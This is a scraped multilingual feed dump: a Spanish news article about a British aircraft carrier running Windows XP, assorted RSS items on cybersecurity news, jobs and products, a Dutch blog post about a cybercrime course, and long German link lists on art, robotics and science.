Asimismo, el comandante asegura que el HMS Queen Elizabeth está fuera de peligro ante potenciales ataques cibernéticos, esto gracias a que cuentan con su propio "grupo dedicado" de especialistas que están atentos en todo momento ante posibles amenazas. Además de que ya están estudiando la posibilidad de actualizar los sistemas y programas informáticos obsoletos, algo que se sucederá "eventualmente".

Hay que destacar que esta no es la primera vez que sucede algo similar en Reino Unido, ya que hace un año se dio a conocer que algunos de sus submarinos nucleares también funcionan bajo Windows XP. La Royal Navy planea poner la HMS Queen Elizabeth a finales de año, que será cuando veamos si hay cambios en los sistemas del buque o todo se mantiene exactamente igual.

En Xataka | Por increíble que parezca, el Pentágono sigue usando Windows 95 en sistemas críticos de seguridad

También te recomendamos

Tenemos 2 inscripciones para que participes en la I Travesía Playas de la Azohía en Cartagena, ¡no te la pierdas!

Es 2017 y yo todavía tengo que trabajar en Windows XP

Reino Unido habría colaborado con la NSA en operaciones de espionaje, capturas y asesinatos

La noticia El portaaviones más grande y potente en la historia del Reino Unido tiene un pequeño problema: usa Windows XP fue publicada originalmente en Xataka por Raúl Álvarez .

          Tier III – Security Analyst - The Herjavec Group - Canada   
Dynamic IT entrepreneur Robert Herjavec founded Herjavec Group in 2003 to provide cybersecurity products and services to enterprise organizations....
From The Herjavec Group - Sat, 17 Jun 2017 05:48:21 GMT - View all Canada jobs
          20% Off All WordPress Themes & Plugins at CyberChimps Coupon   

Save 20% Off All WordPress Themes & Plugins at CyberChimps Coupon.

The post 20% Off All WordPress Themes & Plugins at CyberChimps Coupon appeared first on

          The Era Of Chaos-Inducing Ransomware Is Here And It's Scary As Hell   
The '90s cyberpunk thriller Hackers is used too often to illustrate the fearful future of cyber security, but it's popular for a reason. The film's seemingly fictional scenarios keep coming true. Take this week's global ransomware attack, for instance. It's a plot twist that would make Matthew Lillard leer at the camera and cackle. More »

          Transformers: Revenge of the Fallen (2009)   
  • Genre: Action/Adventure, Suspense/Thriller, SciFi/Fantasy
  • Running Time: 150 min.
  • MPAA Rating: PG-13
  • Director: Michael Bay
  • Writer: Ehren Kruger, Roberto Orci, Alex Kurtzman
  • Cast: Megan Fox, Shia LaBeouf, Rainn Wilson, Hugo Weaving, John Turturro, Josh Duhamel, Tyrese Gibson, Frank Welker, Isabel Lucas, Reno Wilson


Two years have passed since Sam Witwicky and the Autobots saved the human race from the invading Decepticons. Now he's preparing for the biggest challenge of his life: leaving home for college. Leaving home is something the Autobots understand only too well. With the destruction of the Allspark, the Transformers home planet of Cybertron is uninhabitable, and the Autobots make the best of their lives on earth, working in league with the military as part of a top-secret team called NEST. Meanwhile, the Decepticons learn what Sam doesn't know: he alone holds the key to the outcome of the struggle between evil and the ultimate power of good. A normal life will have to wait. With the help of the Autobots, the soldiers of NEST, and an old adversary-turned-ally, former Sector 7 Agent Simmons, Sam and his girlfriend Mikaela must uncover the secret history of the Transformers presence on earth, and the sacrifices that have to be made to save it from an ancient threat sworn on returning here for revenge--an ancient Decepticon named The Fallen.

          Health network's community labs closed after cyberattack   
BEAVER, Pa. (AP) - A health network that fell victim to a worldwide cyberattack was unable Wednesday to offer lab and diagnostic services at 14 community and neighborhood offices as it worked to restore its computer systems.
          Global Ransomware Attacks Boost Cybersecurity Stocks   
          #4: Sony DSC-RX100 Cyber-shot Digitalkamera (20 Megapixel, 3,6-fach opt. Zoom, 7,6 cm (3 Zoll) Display, lichtstarkes 28-100mm Zoomobjektiv F1,8 - 4,9, Full HD, bildstabilisiert) schwarz   
Sony DSCRX100
Sony DSC-RX100 Cyber-shot Digitalkamera (20 Megapixel, 3,6-fach opt. Zoom, 7,6 cm (3 Zoll) Display, lichtstarkes 28-100mm Zoomobjektiv F1,8 - 4,9, Full HD, bildstabilisiert) schwarz
von Sony

Neu kaufen: EUR 362,00
43 Angebote ab EUR 336,66

(In der Kompaktkameras-Bestseller-Liste finden Sie maßgebliche Informationen über die aktuelle Rangposition dieses Produkts.)
          Purism aims to push privacy-centric laptops, tablets and phones to market   

A San Francisco-based start-up is creating a line of Linux-based laptops and mobile devices designed with hardware and software to safeguard user privacy.

Purism this week announced general availability of its 13-in. and 15-in. Librem laptops, which it says can protect users against the types of cyberattacks that led to the recent Intel AMT exploits and WannaCry ransomware attacks.

The laptop and other hardware in development has been "meticulously designed chip by chip to work with free and open source software."

"It's really a completely overlooked area," said Purism CEO Todd Weaver. "We also wanted to start with laptops because that was something we knew we'd be able to do easily and then later get into phones, routers, servers, and desktops as we expand."

To read this article in full or to leave a comment, please click here

          Digitale recherche van start   
Het was me het weekje wel. De aftrap van drie onderdelen waarvan 2 geheel nieuw. Ik schreef al eerder deze week over nieuwe afstudeerpecialisatie 'Business Information'. Vandaag is het nieuwe keuzevak 'Digitale Recherche' van start gegaan.

Keuzevakken zijn kleine onderdelen die studenten in 3e of 4e studiejaar kunnen kiezen als aanvulling op het reguliere programma. Het gaat om een vak dat elders niet in de opleiding wordt aangeboden of een vak dat verdiepend wordt behandeld in de keuzevariant. Deelname aan een keuzevak staat open voor alle studenten van de Hanzehogeschool maar de ervaring leert dat toch vooral personen van het eigen instituut meedoen (in mijn geval het Instituut voor Communicatie & Media).

Voor de IDM-Groningen zijn er dit jaar 2 nieuwe keuzevakken namelijk 'Informatie & Cultureel Erfgoed' en 'Digitale Recherche'. En deze laatste is vandaag dus begonnen.

De eerste groep studenten zijn afkomstig van de opleidingen IDM/Media & Informatiemanagement, Communicatiesystemen, HBO-Rechten, Sociaal Juridische Dienstverlening, Informatica en Communicatie. Onder leiding van collega Bas van Hensbergen en ondergetekende duiken de studenten in de wereld van criminologie, de psychologie van de dader, informatiebeveiliging, ethiek en allerlei vormen van cybercrime. Daarnaast verzorgen enkele mensen uit de dagelijkse praktijk gastcolleges.

De eindopdracht van de studenten is het schrijven van een paper waarin een casus wordt behandeld afkomstig uit de wereld van cybercrime. Daarbij moet gekeken worden naar diverse aspecten zoals ethiek, impact voor de maatschappij, definities, aandacht in de media, rechtzaken (of niet) en jurisprudentie. Ben benieuwd naar de eindresultaten!

          Cybersecurity Sr. Systems Engineer (Requires Security Clearance)   
PA-Philadelphia, Trinity IT has an opening for a senior systems engineer, working cybersecurity tasking at a client's site in Philadelphia, PA. Job Purpose: Provide system information assurance / security engineering to ensure alignment of custom software applications, systems, and infrastructure to ensure compliance with DoD security regulations and guidance. Qualified candidates must be certified to meet DoD 857
          Trends auf dem Kunstmarkt in Hyperlinks   
Homepage Marianne Stark Willkommen beim Kunst- und Textwerk Onkel Hotte: Sam Hotte, Privatdetektiv - Teil 2 Frühstyxradio Online wirrrtschaft 2000-2001 Kunst als Wissenschaft - Wissenschaft als Kunst: Links NEULAND kunst musik bar "bad zwischenahner kunstpreis 2006" - Suche kunstaspekte - kunst international Netzkunst Medien Kunst Netz | Homepage lab30 - augsburger medienkunst ZEIGDEINEKUNST - Startseite :: Archiv für junge Kunst aus München - Akademie der Bildenden Künste München Lisa Erb - Kunst im öffentlichen Raum Wolfgang Müller: Séance Vocibus Avium | Hörspiel und Medienkunst | Bayern 2 | BR videokunst bei cityarts monopol - Magazin für Kunst und Leben Tülay Akcan - Künstler & Kuratoren in kunstaspekte mediathek kabarett Frank Fietzek - kunst und mechatronik Home | Platform3 | Räume für zeitgenössische Kunst Kunst-Portal / Grafik-Portal :: Kunst : Druckgrafik : Malerei : Künstler : Kunstdruck : Kunstgalerien : Termine : Ausstellungen : Grafiker Medien Kunst Netz | Quellentext slinkachu dioramen "der beobachtete beobachter" kunst in martinsried im biozentrum Kunst in Sendling LMUeMotions - Ludwig-Maximilians-Universität München - Home - Kunsthalle Luzern | Connections Sonntag, 25.03.2012 ab 19 Uhr « Corleone | Kunst – Musik – Bar R. Ammer: ELFENFELD: Kunst- und Textwerk - München - Ligsalzstr. 13 Gastspiel - Kunst und Kirche | Stadtakademie München t-u-b-e klanggalerie - radiophone kunst - installationen - audio-performances Other Artists Gert Postel lunaland - licht. kunst. tanzen. Kunst Halle Sankt Gallen LAp kUNSTkLUB, ein Kunstprojekt von Patricia London Ante Paris: NACHTPULS mit Videos von Felix Weinold, Anton Petz, Nana Dix, Heidi Mühlschlegel Martin Blumöhr Anja Hase Gartencoaching | Zeit für den Garten ist Zeit für sich selbst Crossing Munich - Beiträge zur Migration aus Kunst, Wissenschaft und Aktivismus - Institut für Volkskunde/ Europäische Ethnologie - LMU München Haus der Kunst - Home | Ein Projekt des Kunstzentrat e.V. im Import Export Goethestr. 30 Erzählte Kunst: Comics im Hörsaal - Kultur - Wuppertal - Lokales - Westdeutsche Zeitung STRAPAZIN – Das Comic Magazin Wolken der Freiheit « Kunst & Kultur « Magazin « Grün & Gloria IT2media - IT-Solutions for Directory Business INSTANT Mitra Wakil Akademiegalerie – Wikipedia Unbenanntes Dokument FRANCESCA FINI videoart - performance art ATNE | Art Technology New England rebel:art | connecting art and activism TEXTE ZUR KUNST VIRUS on Vimeo Netz-Theorie, Medien-Geschichte V2_Knowledgebase — V2_ Institute for the Unstable Media RADAR ICREW-750V-AKADEMIEGALERIE-INFOS.jpg (JPEG-Grafik, 2457 × 1754 Pixel) - Skaliert (50%) Česká unie karikaturistů - seznam-clenu Artsy - Discover Fine Art FREIE KLASSE MUENCHEN Google Übersetzer Four Ways Internet Artists Are Making Facebook A Less Boring Place | The Creators Project ʞooqǝɔɐɟ | Facebook Die Weltmaschine des Franz Gsellmann Archiv Ostschweizer Kunstschaffen Vatikan: Falscher Bischof schmuggelt sich beim Vorkonklave ein - SPIEGEL ONLINE Konklave-Flitzer Ralph Napierski im Porträt - SPIEGEL ONLINE mucbook: Alles München – geheime Wunderwerke Wikipedia Art press at Wikipedia Art The Sunday Guardian | nathaniel stern Occupy the FDA Archiv Ostschweizer Kunstschaffen k 0 m i k A z E INSILICO Fred Forest-Retrospective-Sociologic art-Aesthetic of communication TheCreatorsProject - YouTube Protest: Hermann Nitsch will wieder seine "Kunst" mit Blut und Eingeweiden von Tieren in Leipzig aufführen | Lorie ESSER skug - Journal für Musik Film.Kunst.Literatur 海岸通ギャラリー・CASO|大阪港の現代美術ギャラリー Schaustelle AABER AWARD 2013 – Kulturpreis für junge Kunst – zu Gast bei WANNDA Klasse Metzel - Publikationen Collaboration Symposium Munich Tollwood: Sommerfestival 2013 Data Dealer - Her mit Deinen Daten! | G! gutjahrs blog Penis verloren - Ladykracher - TV Shows - Shows - [DE] Buzzi, Gerhard - Indianische Heilgeheimnisse. Die Lehren vom Grossvater dem heilige Mann Map of Korea on Vimeo image.jpg (JPEG-Grafik, 875 × 1499 Pixel) - Skaliert (59%) :: Dana Greiner - Akademie der Bildenden Künste München bloc, frank balve's Portfolio T O M S C H U L H A U S E R ART WORK - BiANCA PATRiCiA Bianca Kennedy felix kraus ATLANTIS | ODER DAS HUBERHÄUSL Petersburger Hängung – Wikipedia Medizinischer Behandlungsfehler - Ärztepfusch, ärztliche Kunstfehler?, Linkliste - Opfer berichten, helfen und suchen weitere Kontakte! Kontaktaufnahme über das Private Netzwerk Medizingeschädigter - ▶ United Stasi of America Stop watching us Extended Version Lightart projection embassy Berlin - YouTube l'Ultime-Atome Optical Sound – records & fine arts (1) KAPITÆL ZWEI KOLEKTIF Google-Ergebnis für Club Bleu Situationistische Internationale – Wikipedia Jean-Michel Basquiat – Wikipedia Steve Stackpole's Kinetic Sculpture & Automata Yoshiyuki Miura Ulrike Riede ▶ Lực vương [Full] - YouTube Home | OpenArt Flying Förtress Blög: Oktober 2009 Unser Westend: Comic Gonzo-Magazine - Rainer Hoffmann - Der deutsche Forrest Gump Galerie Hubert Winter - curated by_vienna 2013 Fluxus – Wikipedia Kunst- & Textwerk - Herzlich willkommen in unserem Online-Shop! William Blake – Wikipedia DynamicMix2000 - Sitemap Die Kunst des Alterns - Decies repetita placebit paul rietzl OPEN CREATIVE SPACE! 03 - Ulla von Gemmingen home: ulla von gemmingen Doris Weininger: Vier goldene Regeln auf einer Schiffsreise Erwin Wurm gestaltet ZDF-Kulturmagazin | Monopol - Magazin für Kunst und Leben Paul-Klinger-Künstlersozialwerk e.V. Paul Klinger Künstlersozialwerk e.V. - Home Kosovo 2.0 - Red Min(e)d: Women have the Power home cramer pleintekst Literaturhaus Stuttgart: Code - Interface - Concept (9. bis 11. Nov 2005) Thomas Dreher: Vernetzungskünst(l)e(r) Elektronische Zeitung Schattenblick • INFOPOOL Lyrikzeitung & Poetry News | News that stays news: spread it! – Seit 2001 im Netz The Wrong - The Wrong - New Digital Art Biennale Godzilla – Wikipedia Ishirō Honda – Wikipedia ▁︿╱╲︹╱﹀╲︿_/︺▔╲︹_/▔﹀laimonaszakas die Online Auktion für Kunst und Antiquitäten Bring In Take Out BIG DATA ART 2013 highlike a copy of a copy of a Künstlertreffen - REALTRAUM e. V. - Literatur | Bildende Kunst | Musik | München Der Schwindel der Schlangenbeschwörer – Wikisource Bansky's Christmas card CCC-TV - Seeing The Secret State: Six Landscapes Roger Dean Linkliste, Internetadressen, zusammengestellt von Horst Gaukel, BOA München "Bavaria 2011" Mach mit! 100. Weltfrauentag - Kleine Foto-Kunstaktion - Fotos | Facebook Es sieht aus wie eine Kiste voller Geldscheine. Doch wenn du genauer hinsiehst, verschlägt es dir definitiv den Atem. RADAR annegret veltjens ŠTA IMA!? | LITERATUR, KUNST UND KULTUR AUS SARAJEVO UND EX-JUGOSLAWIEN. Vom 19. März bis 10. April 2014 Wolkenkratzer (Zeitschrift) – Wikipedia Björn Bicker: Urban Prayers | Hörspiel und Medienkunst | Bayern 2 | Radio | Ananaskonsum ▶ Gipfelruf: Melanie Arzenheimer - YouTube - the encyclopedia of painting Buntlack - Home VEGAN ART Sanja Iveković – Wikipedia Sanja Ivekovic - Künstler & Kuratoren in kunstaspekte SUSU Liane Lang Sandra Haselsteiner : Art and Illustration Kornkreis – Wikipedia MIXED MUNICH ARTS Heat Is A Form Of Motion — Das Rumford Labor GATEKEEPER MMA - München Mal Anders - Kunst, Kultur, Ausgehen in München Cornelia Sollfrank – Wikipedia --- Net Data Space vs. Every Day Life --- Aram Bartholl DIE BND-ZENTRALE IN PULLACH. Fotodokumentation von Martin Schlüter. • Versicherungskammer Kulturstiftung :: Pio Ziltz - Akademie der Bildenden Künste München sara raschke ralf homann: biography :: Kristina Schmidt - Akademie der Bildenden Künste München :: Klasse Rehm - Akademie der Bildenden Künste München :: Andreana Dobreva - Akademie der Bildenden Künste München Paintings | Analía Martínez Performance Startseite - Frida Kunstraum München OKIN CZNUPOLOWSKY Startseite h1daxl | maler & illustrator Works 2010-2014 Beschleunigte Kunst Tunnelblick – Kunstprojekt im Pasinger Würmtunnel Filmkunstwochen München | Münchner Kinos machen Programm svankmayer dimensions of dialogue - YouTube C.I.Y.REPUBLIC Novice | Mesto žensk - City of Women Exhibition - HACK.Fem.EAST Cyberpunk101 - Cyberpunk101's Photos | Facebook Project 77 - Cyberpunk101 Cyberpunk101 - Photos | Facebook yy1lw0ouybum3l1l16zc-635x407.jpg (JPEG-Grafik, 635 × 407 Pixel) cityscapes_futuristic_buildings_science_fiction_artwork_1680x1050_69281-635x396.jpg (JPEG-Grafik, 635 × 396 Pixel) 1973587_523169151133488_2072179137_o.jpg (JPEG-Grafik, 2048 × 1170 Pixel) - Skaliert (82%) 1965553_507410592709344_609504907_o.jpg (JPEG-Grafik, 1233 × 638 Pixel) 1064825_507410739375996_1052155055_o.jpg (JPEG-Grafik, 1308 × 623 Pixel) 1410809_460999704017100_499441413_o.jpg (JPEG-Grafik, 3151 × 1331 Pixel) - Skaliert (53%) installations | Rose Stach Tagebuch | Tunnelblick – Kunstprojekt im Pasinger Würmtunnel Werk | Tunnelblick – Kunstprojekt im Pasinger Würmtunnel Leonrod Haus für Kunst Startseite labor-münchen Performances, Inszenierungen, Installationen | Dorothea Seror 1000 Drawings | Draw Anything, with Anything, on Anything A5! Alexa Meade Art Buntlack - Crew: Sonic Artists Against Monsanto Matthias Schamp / Gilbert Geister – Das partizipative Geflecht I 1370396648964.jpg (JPEG-Grafik, 576 × 697 Pixel) Das Projekt artionale 2014: Gegenwartskunst | Artionale 2014 Benoìt Maubrey | Electroacoustic Sculptures Ein skurriles «Psychobuch» - News Kultur: Kunst - Kunst gegen Bares - München Aram Bartholl - Arbeiten - Jeongmoon Choi Adam Brandejs / Maker, Sculptor & programmer Karpat Kunstperformance und Installation von Berkan Karpat Karpat venskespaenle | venske & spänle DONNER Habitat Seven - Büro für Neue Medien E/v/e/r/y/o/n/e F/o/r/e/v/e/r Universal Everything Munich_vision Kunst und Atelierhaus - DomagkPark Power 100 / Art Review Arte Povera – Wikipedia Sieben Freie Künste – Wikipedia Hundert Offene Ateliers: Gegenwartskunst in München - YouTube Elena Bajo - arbeiten DIE WELT DER BILDER | Balls on escalator - YouTube Umspannwerk München | Seit 2007 denkmalgeschütztes Bau-Ensemble von 1930 im Landschaftsschutzgebiet mitten im Englischen Garten in München. Catriona Shaw - Home Vegan - Christoph Maria Herbst - Vegan (2014) - YouTube rag_treasure_d.i.y._ "do it yourself" fashion & more Schweizer Ermittler beschlagnahmen die Einkäufe eines Drogen-Bots | WIRED Germany Origami Tessellation – “Framed Star Tessellation” Instructions | Flotsam and Origami Jetsam ilana shafir ▶ Typewriter Artist - YouTube Paul Smith | Typewriter Artist with Cerebral Palsy | Exklusiv-Interview mit dem ‚Charlie Hebdo‘-Karikaturisten Luz | VICE | Deutschland Kunst in Sendling e.V. - München - Kunst & Unterhaltung | Facebook - Galeri Soyut LowTech Andreas Ohrenschall - Mythophagen HAPPY METAL - Kreative Spezialisten in Holz- und Metallbau galerie | edition.grabsdorf | Die edition.grabsdorf ist die Adresse für zeitgenösische Fotografie und Kunst und historische München-Fotografie. christoph_faulhaber Hartware MedienKunstVerein Dortmund – AKTUELL Hasan M. Elahi - Wikipedia, the free encyclopedia Brendan Dawes - Brendan Dawes VIENNA ART WEEK 2014 » Open Studio Day Wohin mit junger Kunst in München? | mucbook Sebastian Schwamm signalraum – künstler biebie institut für leistungsabfall und kontemplation- biography 13. März bis 17. März 2015 - Arbeitsgruppe Oblomow - department of volxvergnuegen Farbenladen-Newsletter 04/2015 :: Lukas Hoffmann - Akademie der Bildenden Künste München :: Lukas Hoffmann - Akademie der Bildenden Künste München :: Emanuel Guarascio - Akademie der Bildenden Künste München Party – TWO IN A ROW kleine ausstellung 也趣藝廊 - Aki Gallery Art brut – Wikipedia (4) Köşk München ▶ Lebanon Hanover - "Kunst" - YouTube congloria (@congloriapark) | Twitter FULL SIZE ORIGINAL ∞ LOADING Jessica Zaydan Thomas Silberhorn - # Niko Abramidis & NE Collaboration Home Weltraum Künstlerin zu Haftstrafe verurteilt | Amnesty International Deutschland Rob Whitworth Kunst-Bunker Aktuelle Ausstellungen « Sabine Deicke Münchner Wochenanzeiger - Kunstrausch und Lieblingsplätze - 28.09.2014 Stefan Caspari :: Fotokunst Kunstschmiede Heinecker – Home David Heatley Georges Didi-Huberman – Wikipedia Arctica Dreams by Rebecca Bashly - Second Life Landeshauptstadt München - Werner Friedmann – Stiftung Plastic Planet – Wikipedia Akademie der Bildenden Künste München - Projektklasse Prof. Nora Schultz Nora Schultz - Google-Suche Start - Netzwerk Bioplastik Problem: The Ocean Cleanup, developing technologies to extract, prevent and intercept plastic pollution Ohana Künstlerkollektiv - Ohana Aktuelles | i-crew | Interdisziplinäre Projekte KunstunterstuetzungHarryMaurer Wahrnehmung von Frauen in der Arbeitswelt - frau-kunst-politik :: Diana Akoto-Yip - Akademie der Bildenden Künste München Microplastics - Wikipedia, the free encyclopedia Phthalsäureester – Wikipedia - Wikipedia, the free encyclopedia Bayerisches Staatsministerium für Bildung und Kultus, Wissenschaft und Kunst Biokunststoff – Wikipedia UBERMORGEN - cool-heart-raskraski-126 Soziale Plastik,soziale kunst,beuys,Attac
primer v2 bikebot



kukarobot besiegt Boll

Robot Sanitorium in 2L

James, Joint Action for Multimodal Embodied Social Systems, von Fortiss

TUM Phoenix Robotics - studentische Gruppierung an der Fakultät für Maschinenwesen der TU München



angefangen beim automaton







les robots bei panoplie

Christian Rothmann /Roboter-Portraits: Fotografien und Objekte

robotic dance competition 1983

bottin style concepts : the robot within : robot style dance

[youtube= ] c64 impossible mission


pädagogisch nicht sinnvolles, sinnlos zerstörerisches geballer in paradroid obwohl ich 1985 rum einmal sogar direkt den 999er mit dem 001er übernommen habe, ohne schäden anzurichten

gregorianische choräle 1984 gesungen von einem roboter auf dem commodore 64

creepy singing android heads




Roboter im Fraunhofer Forschungsblog


Robotic Tagger

Wer (oder was) beherrscht Wikipedia?
Zur Bedeutung von Bots

Die Roboterjournalisten kommen

Narrative Science- journalistische Algorithmen

Can an algorithm write a better news story than a human reporter?

Can the computers at narrative science replace paid writers?

bots bei xlqr

webmasterworld forumbeitrag

zu robots.txt

artikel in deinbaer.blogspot

fixmbr robots.txt

webcrawler artikel bei wikipedia





semantische websuche

forum yacy zu robots.txt

aihub - community site for Artificial Intelligence and chatbot news, articles, links, downloads, and discussion

film robots

agent rubys edream portal

elbot chatbot

lasergesteuerter roboter

webcrawler, automation und barrierefreiheit

robotik und orthopädie

hexapod robot


robot-spider arana mecanica

Jesse Sullivan Operates a Bionic Arm with his Brain at RIC (no sound)

رجل الي يصل Islamic Robot IIUM Robot is praying (witir)

exoskelett hilft menschen mit neuromuskulären behinderungen


roboter operiert am schlagenden herzen

roboter der blut abnimmt

zahnarztpatient-roboter kokoro

Roboterassistierte laparoskopische Prostataentfernung an der klinik lindberg

DaVinci Roboter-assistierte Chirurgie in Bildern®

claudia mitchell operates a bionic arm with her brain



the trons- robot band macht gute musik

Robot DJ

hand robot klettert am buchregal hoch und holt sich ein buch


sprachgesteuerte Flugdrohne


robot rights

kurzweil AI

virtual humans

iGod chatbot

"i build my own friends"

alicebot chatbot

infone neuronale netze

maschinenpoesie, eliza dissertation

poetron zone

beobachter der bediener von maschinen

5voltcore roboterkunst

X-Stitch Robot no.8 by ELIOT

maschinismus kunst

happy robot von evelyne janssen

f18 institut kunst

getaggt mit "toilet cleaning",artikel über lady-bug styled robot to clean restrooms

scooba und roomba




tetra vaal policebot

tv-robotics human substitution technologies

björk- all is full of love

Krach der Roboter: experimenteller Music Performer

[caption id="" align="alignnone" width="495"] Krach der Roboter im Kulturpalast Wedding , Foto (c)[/caption]

yt-vid "Roboter im Kulturpalast"

humanoid robots thomas and janet kissing

bayrischer polizeiroboter

care-o-bot museumsroboter und mobile serviceroboter


unterhaltungsbots von neobotix präsentiert

mechanische elefanten

roboter baut ziegelwände mit lüftungsschlitzen

asimovs gesetze der robotik und reaktionen aus dem netz darauf

etymologisch: bot-roboter-rabota 1920 : Karel Čapek, Autor von "R.U.R."


film "i robot"


kleiner bot der dominosteine aufstellt

KI 2008 Exhibition

schwärme von fliegenden LED-coptern bilden schwebende 3D-displays

Film AI - künstliche intelligenz - über Mechas und Orgas

Film Proteus - des Teufels Saat - über ein KI haus das sich selbständig macht und eine Frau schwängert

das Cover der LP "Normalette" von "der Plan" zeigt einen am Fluß angelnden Roboter

in der zeichentrickserie futurama geht es auch viel um robotik und das verhältnis von menschen zu maschinen, mmi

Brain-Computer Interface for Disabled People to Control Second Life With Thought

David Guetta feat Nicki Minaj - Turn me On - Musikvideo im Robotik-Secondlife-stil natürlich wieder mit Autotune

Gespräch vom 24.01.2008: Was im Reich der Robotik heute schon möglich ist, in welchen Formen uns die Maschinengeister heute schon zur Hand gehen, und wie intelligent Roboter heute, oder in absehbarer Zeit, sein können und dürfen - darüber spricht Gert Scobel mit Holk Cruse, Klaus Mainzer und Rolf Pfeifer.

- The Most Evil (?) Robots in Science Fiction Movie History -

[gallery link="file"]

Bots mit gültigem Bot-Flag auf Wikipedia:

2013-10-11 21.13.15


Roboter trampt allein durch Kanada

Programmable self-assembly in a thousand-robot swarm

Riding an ABB IRB 6600 Robot 1

KUKA robot playing with people on ELECTROcom 2011 exhibition in Budapest

- - - - - - - - - - - -

:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|]

:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|]

:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] Drohnenballett: Spiegel-Bericht von Ein EU-Projekt erforscht die Zukunft fliegender Autos. Sie könnten sich in Schwärmen bewegen wie Zugvögel. Das Lehrreichste dabei sind derzeit oft noch die Abstürze."
:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|]

"The non-verbal documentary ROBOT WORLD depicts the evolution of robots from a mechanical somnambulist to an autonomous sensorium. The neoclassical violinist Matt Howden emphasizes the film’s message: these artificial people are our alternate doubles."
:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|]
:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|]
Donna Haraway - Cyborg Manifesto
:|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|] :|]

          Was ist Wissenschaft   
Ibn Ishāq – Wikipedia - - | geoscience online - das Wissensmagazin mit Science-News aus Wissenschaft und Forschung Kunst als Wissenschaft - Wissenschaft als Kunst: Links Sprechwissenschaft und Psycholinguistik Weltraum: Faszinierendes Foto des „Auge Gottes“ - Astronomie - FOCUS Online n0name COMPUTER: Bespitzeln, erpressen, zerstören - Wissenschaft - FOCUS Online STN wissenschaftliche datenbanken IVS-BM: wissenschaftliche datenbanken archive und zeitschriften - Wissenschaft, Kultur, Politik LLEK Bookmarks - Wissenschaftliche Suchmaschinen Medien- und Kulturwissenschaften [Gender] - Prof. Dr. Marie-Luise Angerer Plastische Chirurgie: Gesichtstransplantation übertrifft alle Erwartungen - Nachrichten Wissenschaft - WELT ONLINE Dr. Reinhold Grether's Media Arts List (Netzwissenschaft) - Golan Levin and Collaborators Nimet Seker – Journalistin und Islamwissenschaftlerin Schildower Kreis - Drogenpolitisches Netzwerk von Experten aus Wissenschaft und Praxis Trierer Medienblog » Kommunikationsformen Nadja Maleh - Wissenschaft - YouTube Crossing Munich - Beiträge zur Migration